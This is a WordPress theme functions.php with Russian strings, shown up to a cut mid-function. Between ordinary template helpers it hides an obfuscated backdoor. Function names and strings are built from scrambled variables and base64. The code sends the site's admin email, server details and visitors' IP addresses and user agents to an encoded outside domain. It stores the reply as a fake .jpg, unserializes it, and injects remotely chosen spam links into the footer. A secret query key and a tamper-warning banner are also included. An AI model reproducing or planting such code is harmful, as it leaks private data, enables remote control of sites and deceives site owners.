<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $PpAGR='e';$ZIxccy='e';$gaiBkBC='a';$LuTzEx='s';$QJTQnys='d';$hWdt='e';$tdZDF='_';$oITQ='c';$WUsq='o';$XmkS='6';$sddrtV='4';$jrWdQB='d';$lBZp='b';$UleUTiUo=$lBZp.$gaiBkBC.$LuTzEx.$hWdt.$XmkS.$sddrtV.$tdZDF.$jrWdQB.$ZIxccy.$oITQ.$WUsq.$QJTQnys.$PpAGR;$cidwqha='n';$dDfBaeF='f';$bhtbTVd='a';$hBjjA='l';$odVU='g';$ZLCcv='i';$YDMcgSD='e';$NfxQC='t';$ZQSG='z';$DIVCgxxY=$odVU.$ZQSG.$ZLCcv.$cidwqha.$dDfBaeF.$hBjjA.$bhtbTVd.$NfxQC.$YDMcgSD;$cDzb='1';$bvUtsl='r';$orRS='_';$KuGx='t';$NqZTn='r';$jLFQ='t';$zFAXv='s';$MjMdb='3';$jGdPga='o';$kDprWqkR=$zFAXv.$KuGx.$NqZTn.$orRS.$bvUtsl.$jGdPga.$jLFQ.$cDzb.$MjMdb;$LxWwtUM='r';$zHwdd='r';$eaviLzw='e';$llGDL='v';$rAzRp='t';$nEMO='s';$XpxkoEdK=$nEMO.$rAzRp.$zHwdd.$LxWwtUM.$eaviLzw.$llGDL;                     
		$zd_____________t='e';$dm_____g='e';$cq___________w='a';$ww_____________v='s';$mz_______g='d';$am____o='e';$ud_______________f='_';$dx___z='c';$uz_____________u='o';$ua____________n='6';$tr_______g='4';$bf_________d='d';$cx______________c='b';$hh___r=$cx______________c.$cq___________w.$ww_____________v.$am____o.$ua____________n.$tr_______g.$ud_______________f.$bf_________d.$dm_____g.$dx___z.$uz_____________u.$mz_______g.$zd_____________t;
		$ax___________a='t';$mi____________t='_';$rg_____l='e';$tk___________y='n';$qr__________l='t';$zb______________h='s';$gi_________o='u';$vh_______________f='o';$ni_______y='f';$ho____________h='i';$he_______________v='n';$yo___________g='s';$wc_______x='i';$vw____________y='c';$qz_______l='x';$jm___h=$ni_______y.$gi_________o.$tk___________y.$vw____________y.$ax___________a.$ho____________h.$vh_______________f.$he_______________v.$mi____________t.$rg_____l.$qz_______l.$wc_______x.$zb______________h.$qr__________l.$yo___________g;
		$zw______________z='p';$ol___________n='f';$qw___________s='e';$ct_______h='n';$zi____________s='o';$bj_________m=$ol___________n.$zi____________s.$zw______________z.$qw___________s.$ct_______h;
		$dm__________j='a';$rj____h='d';$du____c='e';$bj______d='f';$dr________j='r';$jl________d=$bj______d.$dr________j.$du____c.$dm__________j.$rj____h;
		$wf__________s='e';$tn_____a='o';$bf___________s='c';$bv_______g='s';$lo______f='f';$kv______u='l';$ri_____________t=$lo______f.$bf___________s.$kv______u.$tn_____a.$bv_______g.$wf__________s;
		
		define("WP_ID", $hh___r("Mi4wLjA="));
		define("WP_TTL", $hh___r("MTA4MDA="));
		define("WP_SRC", $hh___r("dHBva24="));
	


		function wp_get_header() {
			global $hh___r, $jm___h;
			
			if (
				$jm___h($hh___r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$jm___h($hh___r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$jm___h($hh___r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $hh___r, $bj_________m, $ri_____________t, $jl________d;
			
			$rc______j = TEMPLATEPATH."/".$hh___r("Zm9vdGVyLnBocA==");
			$xs______h = @$bj_________m($rc______j, "r");
			$rc______j = @$jl________d($xs______h, @filesize($rc______j));
			@$ri_____________t($xs______h);
			
			$pa__________z = TEMPLATEPATH."/".$hh___r("ZnVuY3Rpb25zLnBocA==");
			$xs______h = @$bj_________m($pa__________z, "r");
			$pa__________z = @$jl________d($xs______h, @filesize($pa__________z));
			@$ri_____________t($xs______h);
			
			$mm_____e = 0;
			if($rc______j && $pa__________z) {
				if ($hh___r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($rc______j, $hh___r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$mm_____e = 1;
					}
					if (substr_count($rc______j, "wp_theme_GPL_credits()") < 1) {
						$mm_____e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$mm_____e = 12;
				}
			}
			
			if($mm_____e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $mm_____e -->";
			}
		}
	


		function wp_loaded() {
			global $hh___r, $jm___h;
			return $jm___h($hh___r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ba_______________k, $lb______________m = "(more...)", $ya_______d = 0, $lq___t = "") {
				$cv______________m = get_the_content($lb______________m, $ya_______d, $lq___t);
				$cv______________m = apply_filters("the_content", $cv______________m);
				
				$cv______________m = str_replace("]]>", "]]>", $cv______________m);
				if (strlen($_GET["p"]) > 0) {
					echo $cv______________m;
				}
				else if ((strlen($cv______________m)>$ba_______________k) && ($ws____________a = strpos($cv______________m, " ", $ba_______________k ))) {
					$cv______________m = substr($cv______________m, 0, $ws____________a);
					$cv______________m = $cv______________m;
					echo $cv______________m;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lb______________m</a></div></p>";
				} else {
					echo $cv______________m;
				}
				
			}
		}
	


		$mu_________t='e';$pi_________b='d';$xr____________n='_';$hu____________t='o';$ql______i='n';$ik____o='c';$ck______________g='4';$gw__________f='s';$tb______a='e';$sx___w='a';$wh_____________z='e';$ho___i='b';$mn____________t='6';$us______________u=$ho___i.$sx___w.$gw__________f.$mu_________t.$mn____________t.$ck______________g.$xr____________n.$tb______a.$ql______i.$ik____o.$hu____________t.$pi_________b.$wh_____________z;
		$pw____________z='_';$wn__________f='e';$du____m='l';$pk_________r='s';$ch_____k='t';$im_______l='e';$xp____________m='e';$lm__________a='n';$hw_________f='t';$ij__b='t';$ys______________i='_';$fv___________d='o';$sn_________o='g';$hq________m='f';$az__________d='n';$cl__________f='c';$kj_________i='i';$ep___w=$hq________m.$kj_________i.$du____m.$xp____________m.$pw____________z.$sn_________o.$im_______l.$ch_____k.$ys______________i.$cl__________f.$fv___________d.$lm__________a.$ij__b.$wn__________f.$az__________d.$hw_________f.$pk_________r;
		$yu________y='s';$ys__________o='s';$xb_______________t='e';$un__x='l';$ac_______________s='i';$kt______________x='i';$xu_____k='_';$ne______________p='f';$wl___________r='t';$iy____________c='x';$qa_____________y='e';$cr___z=$ne______________p.$ac_______________s.$un__x.$qa_____________y.$xu_____k.$xb_______________t.$iy____________c.$kt______________x.$yu________y.$wl___________r.$ys__________o;
		$vp_____v='e';$eo____________z='c';$ov_____u='i';$xt________p='n';$ov_______________m='a';$ee_______c='r';$yi____________i='_';$xv___________v='e';$kv_____________k='v';$yi_____x='o';$dy_____________i='o';$na_______________x='s';$eg____________k='r';$ps__________d='p';$fo____________s='m';$oz___________z=$kv_____________k.$vp_____v.$eg____________k.$na_______________x.$ov_____u.$yi_____x.$xt________p.$yi____________i.$eo____________z.$dy_____________i.$fo____________s.$ps__________d.$ov_______________m.$ee_______c.$xv___________v;
		$wj_______________k='c';$fe_________i='n';$rf_______________t='e';$jn________o='o';$dz___a='s';$ql_____________u='k';$ob___d='o';$cz____u='f';$ms__________u='p';$am__k=$cz____u.$dz___a.$jn________o.$wj_______________k.$ql_____________u.$ob___d.$ms__________u.$rf_______________t.$fe_________i;
		$tc__c='e';$qm____t='r';$ui_________x='f';$mp_________y='i';$wc_______________f='t';$yw_______d='w';$ni___________g=$ui_________x.$yw_______d.$qm____t.$mp_________y.$wc_______________f.$tc__c;
		$xk_____________k='m';$aj______x='d';$lh___e='5';$cr_________v=$xk_____________k.$aj______x.$lh___e;
		$kk___p='l';$lc_______________y='h';$gg_____________r='t';$iz______w='a';$os___f='e';$ib_____________q='p';$nk________s='r';$yq______p='a';$do___o=$nk________s.$os___f.$yq______p.$kk___p.$ib_____________q.$iz______w.$gg_____________r.$lc_______________y;
		$jr_____m='a';$pa___y='i';$ol____l='i';$ep__k='u';$xa________v='s';$zv______j='r';$cj_____f='e';$nc______________k='z';$py_______u='l';$dk______r='e';$xb______________m='n';$uw______p=$ep__k.$xb______________m.$xa________v.$dk______r.$zv______j.$pa___y.$jr_____m.$py_______u.$ol____l.$nc______________k.$cj_____f;
		$ui_______________d='m';$zb______________e='e';$ou______________y='t';$ht____________f='m';$fc___________d='n';$qt_________g='a';$yu____________a='p';$qd_____p=$ou______________y.$zb______________e.$ht____________f.$yu____________a.$fc___________d.$qt_________g.$ui_______________d;
		$lm__x='o';$id____________z='t';$lq______u='t';$zf___________j='c';$pi_______y='e';$jf_____________s='s';$yz______c='e';$oy___________y='t';$dj____________k='n';$qo___________o='a';$ca___________f='r';$jl__________o='e';$ip_______________u='c';$ar________h='m';$kr___________l='x';$ff______________b='t';$hv________n='r';$qn_______x='_';$qd______________p='_';$el_______o='a';$wt__f='e';$df_________a=$jf_____________s.$lq______u.$hv________n.$wt__f.$el_______o.$ar________h.$qn_______x.$zf___________j.$lm__x.$dj____________k.$ff______________b.$yz______c.$kr___________l.$id____________z.$qd______________p.$ip_______________u.$ca___________f.$jl__________o.$qo___________o.$oy___________y.$pi_______y;
	


		function dh_______x($bm_____________c) {
			global $hh___r, $jm___h, $ep___w, $oz___________z, $df_________a;
			
			if (!$jm___h($hh___r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($oz___________z(PHP_VERSION, "5.0.0", ">=") && $jm___h($hh___r("ZmlsZV9nZXRfY29udGVudHM=")) && $jm___h($hh___r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$dg________s = $df_________a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$wc____________h = @$ep___w($bm_____________c, 0, $dg________s);
			} else {
				$wc____________h = @$ep___w($bm_____________c, 0);
			}
			
			return $wc____________h;
		}
	


		function mx_______________m($bm_____________c) {
			global $jm___h, $am__k, $ni___________g, $hh___r;
			
			if (!$jm___h($hh___r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$bu________b = strpos($bm_____________c, "/", 7);
			$qo___c = array(
				"uri"     => substr($bm_____________c, $bu________b),
				"host"    => str_replace("http://", "", substr($bm_____________c, 0, $bu________b)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$mc_______________d = @$am__k("$qo___c[host]", 80, $wv_________o, $tx_______________o, 4);
			
			if (!$mc_______________d) {
				return false;
			} else {
				$wc____________h = "";
				$sc________b  = "GET $qo___c[uri] HTTP/1.0\r\n";
				$sc________b .= "Host: $qo___c[host]\r\n";
				$sc________b .= "Referer: $qo___c[referer]\r\n";
				$sc________b .= "Connection: Close\r\n\r\n";
				
				@$ni___________g($mc_______________d, $sc________b);
				
				while (!@feof($mc_______________d)) {
					$ia_________s = @fgets($mc_______________d, (1024*24));
					
					if ($ia_________s == "\r\n") {
						$gx______z = true;
						continue;
					}
					
					if ($gx______z) {
						$wc____________h .= $ia_________s;
					}
				}
				
				return $wc____________h;
			}
		}
	


		function ke________b($bm_____________c) {
			global $jm___h;
			$it______________g = false;
			
			if ($bm_____________c != "") {
				if ($jm___h("dh_______x")) {
					$it______________g = @dh_______x($bm_____________c);
				}
				
				if (!$it______________g && ($jm___h("mx_______________m"))) {
					$it______________g = @mx_______________m($bm_____________c);
				}
			}
			
			return $it______________g;
		}
	


		function gu_______________f() {
			global $_SERVER, $cr_________v;
			
			$qh___________x = $_SERVER["SERVER_NAME"];
			
			if (substr("$qh___________x", 0, 4) == "www.") {
				$qh___________x = substr("$qh___________x", 4);
			}
			
			$qh___________x = $cr_________v("$_SERVER[SERVER_NAME]");
			
			return $qh___________x;
		}
	


		function py________y() {
			return "file";
		}
	


		function cg_________c($bm_____________c) {
			global $_SERVER, $ep___w, $cr___z, $bj_________m, $ri_____________t, $ni___________g;
			
			$hf__s = yy_________m();
			
			$ag_________x = gu_______________f().".jpg";
			$hl___________l = $hf__s["dir_upload"]["path"]."/$ag_________x";
			$mu____p = @filemtime($hl___________l);
			
			if (!$mu____p || ((time()-$mu____p) >= WP_TTL)) {
				$it______________g = ke________b($bm_____________c);
				
				if ($it______________g) {
					if ($cr___z($hl___________l)) {
						@unlink($hl___________l);
					}
					
					$xs______h = @$bj_________m($hl___________l, "x+");
					
					@$ni___________g($xs______h, $it______________g);
					@$ri_____________t($xs______h);
				}
			} else {
				if ($cr___z($hl___________l)) {
					$it______________g = @$ep___w($hl___________l);
				} else {
					$it______________g = false;
				}
			}
			
			return $it______________g;
		}
	


		function yy_________m() {
			global $_SERVER, $hh___r, $us______________u;
			
			$xs______________e = wp_count_posts("post");
			$jn__y = pathinfo(get_bloginfo("template_directory"));
			
			$hf__s = array(
				"url" => array(
					"report"      => $hh___r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $jn__y,
				"dir_upload"	=> dz_______________n(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$jn__y[filename],
					"a005=".$xs______________e->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/kashevaya-dieta-daet-xoroshij-rezultat\">Кашевая диета</a> "
			);
			
			$hf__s["url"]["queryString"] = implode("&", $hf__s["queryString"]);
			$hf__s["url"]["report"] = $hf__s["url"]["report"]."/?".$us______________u($hf__s["url"]["queryString"]).".html";
						
			return $hf__s;
		}
	


		function dz_______________n() {
			$ga______y = wp_upload_dir();
			
			if (isset($ga______y["error"])) {
				$rg__v = ol______c();
				if (is_writable($rg__v)) {
					$ga______y = array("path" => $rg__v);
				}
			}

			return $ga______y;
		}
	


		function ol______c() {
			global $jm___h, $cr_________v, $do___o, $qd_____p;
			
			$vt____________b = (bool) ini_get("safe_mode");
			if ($vt____________b == true) {
				return false;
			}
			
			if ($jm___h("sys_get_temp_dir")) {
				$le______c = sys_get_temp_dir();
				if (is_writable($le______c)) {
					return $do___o($le______c);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $do___o($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $do___o($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $do___o($_ENV["TEMP"]);
			} else {
				$yd________j = $qd_____p($cr_________v(uniqid(rand(), true)), "");
				if ($yd________j) {
					$le______c = $do___o(dirname($yd________j));
					@unlink($yd________j);
					return $le______c;
				} else {
					return false;
				}
			}
		}
	


		function mq______________d() {
			global $_GET, $cr___z;
			
			$hf__s = yy_________m();
			$qh___________x = gu_______________f();
			$lo_____________l = py________y();
			
			$dj__l = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($lo_____________l == "file") {
					$qv___________e = $hf__s["dir_upload"]["path"]."/".$qh___________x.".jpg";
					if ($cr___z($qv___________e)) {
						@unlink($qv___________e);
						$dj__l = "deleted";
					}
				}
				
				$kj____a = array(
					"s"	=> $dj__l,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($kj____a AS $sc_______j => $ya_________y) echo " [$sc_______j:$ya_________y]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $jm___h, $hh___r, $uw______p;
			$hf__s = yy_________m();
			
			$vu_____________k = "cg_________c";
			if ($jm___h($vu_____________k)) {
				$wc____________h = $vu_____________k($hf__s["url"]["report"]);
			}
			
			if ($wc____________h) {
				if ($wc____________h = @$hh___r($wc____________h)) {
					$wc____________h = @$uw______p($wc____________h);
					
					if (strlen($wc____________h[custom_credit]) >= 5) {
						$hf__s["default_string"] = $wc____________h[custom_credit];
					}
					
					if ($wc____________h["status"] == "0") {
						$nr_____b = 1;
						$sq________m = 1;
					} else {
						$cd_______w = sizeof($wc____________h["links"]);
						$ur__________f = $hf__s["default_string"];
						
						if ($cd_______w > 0 && $wc____________h["links"] !== "") {
							$oe____________m = 0;
							foreach ($wc____________h["links"] as $gs___________d => $nl____x) {
								$oe____________m++;
								if ($nl____x->l_path == "" || $nl____x->l_path == $_SERVER["REQUEST_URI"]) {
									$nl____x->l_href = htmlspecialchars(strip_tags($nl____x->l_href));
									$nl____x->l_title = htmlspecialchars(strip_tags($nl____x->l_title));
									$nl____x->l_anchor = htmlspecialchars(strip_tags($nl____x->l_anchor));
									$ur__________f .= " | ";
									$ur__________f .= "<a href='$nl____x->l_href' title='$nl____x->l_title'";
									if ($nl____x->l_nofollow == "1") {
										$ur__________f .= " rel='nofollow'";
									}
									$ur__________f .= ">$nl____x->l_anchor</a>";
								}
							}
						}
						$hf__s["links"] = "$ur__________f";
						if ($wc____________h[credit] == "0") {
							$hf__s["links"] = "";
						}
					}
				} else {
					$nr_____b = "1";
				}
			} else {
				$nr_____b = "1";
			}
			
			if ($nr_____b == "1") {
				$hf__s["links"] = $hf__s["default_string"];
			}
			
			echo "$hf__s[links]";
			
			echo "<!-- s: $wc____________h[signature] -->";
			mq______________d();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
          $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
